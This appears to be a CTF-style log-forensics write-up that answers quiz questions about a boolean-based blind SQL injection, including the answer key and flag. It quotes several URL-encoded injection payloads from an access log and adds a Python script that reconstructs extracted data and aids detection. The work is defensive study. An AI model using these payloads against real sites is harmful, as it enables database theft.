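Question (1):
The injection technique the attacker used is called (布尔盲注, i.e. boolean-based blind injection). (The answer format is 4 Chinese characters, e.g. "拼搏努力".)
Boolean-based blind injection:
A boolean-based blind injection attack exploits the way the application makes logical decisions. The attacker builds a condition into the WHERE clause of the query so that the result has only two possible outcomes: the condition holds (TRUE) or it does not (FALSE). If the application responds differently depending on that outcome, the attacker can use the responses to infer the data stored in the database and so obtain sensitive information.
The injection requests use the substr() function, which indicates boolean-based blind injection.
Question (2):
The database name, table name and column name from which the attacker finally obtained the flag are (sqli#flag#flag). (The format is "database name#table name#column name", e.g. database#table#column.)
The log shows that the database name is sqli, the table name is flag, and the column name is flag.
Question (3):
The flag string the attacker finally obtained is ()
The flag string the attacker finally obtained is flag{deddcd67-bcfd-487e-b940-1217e668c7db}
Analysis shows that each time a character is guessed correctly, the following six lines are returned below it: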
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 430 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
For example, when the character 4 is guessed correctly, the following information is returned
The flag is deduced from this.
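
The reconstruction described above can be automated when reviewing such an access log. The following is an added example, not part of the original write-up; the names parse_probe, recover, sample_line and SAMPLE are hypothetical, and the sample log lines are constructed in the same format as the entries shown above.

```python
import re
from urllib.parse import quote, unquote

REQUEST = re.compile(r'"GET (\S+) HTTP/[\d.]+"')
# Probe shape seen in the log: substr((select flag from sqli.flag),<pos>,1) = '<char>'
PROBE = re.compile(r"substr\(\(select flag from sqli\.flag\),(\d+),1\) = '(.*?)',1,", re.S)

def parse_probe(line):
    """Return (position, guessed_char) for a probe request, else None."""
    req = REQUEST.search(line)
    if not req:
        return None
    m = PROBE.search(unquote(req.group(1)))
    return (int(m.group(1)), m.group(2)) if m else None

def recover(lines):
    """Rebuild the extracted string from the order of the probes.

    Assumption, taken from the write-up: the tool moves to the next position
    as soon as a guess is right, so the last guess logged for a position before
    a higher position appears is the correct one. The final position has no
    successor and is returned separately as unconfirmed.
    """
    confirmed, cur_pos, cur_char = {}, None, None
    for line in lines:
        probe = parse_probe(line)
        if probe is None:
            continue  # ordinary traffic, not a probe
        pos, ch = probe
        if cur_pos is not None and pos > cur_pos:
            confirmed[cur_pos] = cur_char
        cur_pos, cur_char = pos, ch
    return "".join(confirmed[p] for p in sorted(confirmed)), (cur_pos, cur_char)

def sample_line(pos, ch):
    """Constructed log line in the same format as the entries above."""
    q = quote(f"1 and if(substr((select flag from sqli.flag),{pos},1) = '{ch}',1,"
              "(select table_name from information_schema.tables))", safe="(),='")
    return (f'172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id={q} '
            'HTTP/1.1" 200 428 "-" "python-requests/2.26.0"')

# Constructed sample: guesses descend as in the log; the hidden value starts "bc".
SAMPLE = ([sample_line(1, c) for c in "dcb"] + [sample_line(2, c) for c in "dc"]
          + ['172.17.0.1 - - [01/Sep/2021:01:46:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 400 "-" "-"']
          + [sample_line(3, c) for c in "dcba"])

if __name__ == "__main__":
    print(recover(SAMPLE))
```

The same per-position grouping also works as a detection signal: a single client issuing long runs of substr(...,N,1) comparisons with N steadily increasing is characteristic of automated blind extraction.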